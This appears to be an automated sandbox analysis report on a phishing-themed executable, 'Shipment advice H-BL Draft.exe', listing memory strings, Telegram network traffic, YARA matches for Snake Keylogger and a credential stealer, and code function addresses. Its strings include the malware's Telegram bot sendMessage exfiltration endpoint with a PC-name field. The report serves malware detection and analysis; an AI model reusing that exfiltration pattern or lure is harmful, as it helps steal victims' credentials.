                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20a
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3722661271.0000000003C74000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3722661271.0000000003C74000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B0A000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3722661271.0000000003C74000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3722661271.0000000003C74000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3722661271.0000000003C74000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F80000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H~
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 13.2.Shipment advice H-BL Draft.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTRMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_016E3E400_2_016E3E40
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_016E6F900_2_016E6F90
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_016EDA7C0_2_016EDA7C
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_07C6C7780_2_07C6C778
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_07C6C3400_2_07C6C340
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_07C6CFF30_2_07C6CFF3
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_07C6EC5F0_2_07C6EC5F
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_07C6EC700_2_07C6EC70
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_07C6CBC00_2_07C6CBC0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_07CC48980_2_07CC4898
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280D27813_2_0280D278
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280537013_2_02805370
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280C14813_2_0280C148
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280C73813_2_0280C738
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280C46813_2_0280C468
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280CA0813_2_0280CA08
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280E98813_2_0280E988
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_028069B013_2_028069B0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280CFA913_2_0280CFA9
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280CCD813_2_0280CCD8
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_02809DE013_2_02809DE0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_028029E013_2_028029E0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280F96113_2_0280F961
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280F97013_2_0280F970
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280E97A13_2_0280E97A
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_02803E1813_2_02803E18
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669966813_2_06699668
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_06692A9013_2_06692A90
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_06691FA813_2_06691FA8
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669185013_2_06691850
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669514813_2_06695148
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_06699D3813_2_06699D38
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669D66013_2_0669D660
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669D67013_2_0669D670
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669D21813_2_0669D218
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669DAC813_2_0669DAC8
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669DAB913_2_0669DAB9
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669E36A13_2_0669E36A
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669E37813_2_0669E378
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669DF2013_2_0669DF20
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_06690B2013_2_06690B20
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_06690B3013_2_06690B30
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669DF1F13_2_0669DF1F
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669E7CF13_2_0669E7CF
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669E7D013_2_0669E7D0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_06691FA213_2_06691FA2
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669F07113_2_0669F071
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669184113_2_06691841
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669004013_2_06690040
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669EC2813_2_0669EC28
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669003F13_2_0669003F
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669EC1813_2_0669EC18
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_06698CC013_2_06698CC0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669F4D813_2_0669F4D8
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669F08013_2_0669F080
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669F92213_2_0669F922
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669513813_2_06695138
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669F93013_2_0669F930
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669CDC013_2_0669CDC0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0669CDAF13_2_0669CDAF
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 14_2_01953E4014_2_01953E40
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 14_2_01956F9014_2_01956F90
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 14_2_0195DA7C14_2_0195DA7C
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 14_2_077839F814_2_077839F8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148C14618_2_0148C146
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148537018_2_01485370
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148D27818_2_0148D278
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148C47418_2_0148C474
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148C73818_2_0148C738
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148E98818_2_0148E988
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_014869A018_2_014869A0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_01483B9518_2_01483B95
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148CA0818_2_0148CA08
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_01489DE018_2_01489DE0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148CCD818_2_0148CCD8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_01486FC818_2_01486FC8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148CFAC18_2_0148CFAC
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_01483E0918_2_01483E09
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148F96118_2_0148F961
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148E97C18_2_0148E97C
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_014829EC18_2_014829EC
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_01483AA118_2_01483AA1
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C81D018_2_056C81D0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C7B7818_2_056C7B78
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C8FB018_2_056C8FB0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CC56018_2_056CC560
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CA57018_2_056CA570
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CC54F18_2_056CC54F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C0D4818_2_056C0D48
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CE54018_2_056CE540
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CA55F18_2_056CA55F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CE55018_2_056CE550
